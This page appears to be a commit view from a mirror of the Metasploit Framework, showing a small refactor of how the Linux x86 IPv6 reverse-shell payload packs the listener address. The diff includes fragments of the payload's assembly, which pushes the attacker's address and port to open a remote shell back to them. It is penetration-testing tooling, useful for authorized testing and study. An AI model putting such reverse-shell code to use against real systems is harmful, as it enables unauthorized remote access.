infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up ipv6 address assembly packing

GSoC/Meterpreter_Web_Console
Adam Cammack 2018-06-13 15:31:49 -05:00
parent d6f0673840
commit 0d9eb5b662
No known key found for this signature in database
GPG Key ID: C9378BA088092D66
1 changed files with 6 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb
View File

@ -38,12 +38,8 @@ def generate_stage
tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string. tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
# ipv6 address conversion # ipv6 address conversion
words = IPAddr.new(datastore['LHOST']).hton.scan(/..../).map {|i| i.unpack('V')} # converts user's input into ipv6 hex representation # converts user's input into ipv6 hex representation
first = words[0].join(', ') # removes brackets, otherwise will reference to a pointer words = IPAddr.new(datastore['LHOST']).hton.scan(/..../).map {|i| i.unpack('V').first.to_s(16)}
second = words[1].join(', ')
third = words[2].join(', ')
fourth = words[3].join(', ')
payload_data =<<-EOS payload_data =<<-EOS
xor ebx,ebx xor ebx,ebx
mul ebx mul ebx
@ -61,10 +57,10 @@ def generate_stage
xor ebx,ebx xor ebx,ebx
push ebx push ebx
push ebx push ebx
push #{fourth} push 0x#{words[3]}
push #{third} push 0x#{words[2]}
push #{second} push 0x#{words[1]}
push #{first} push 0x#{words[0]}
push ebx push ebx
push.i16 0x#{tcp_port} push.i16 0x#{tcp_port}
push.i16 0xa push.i16 0xa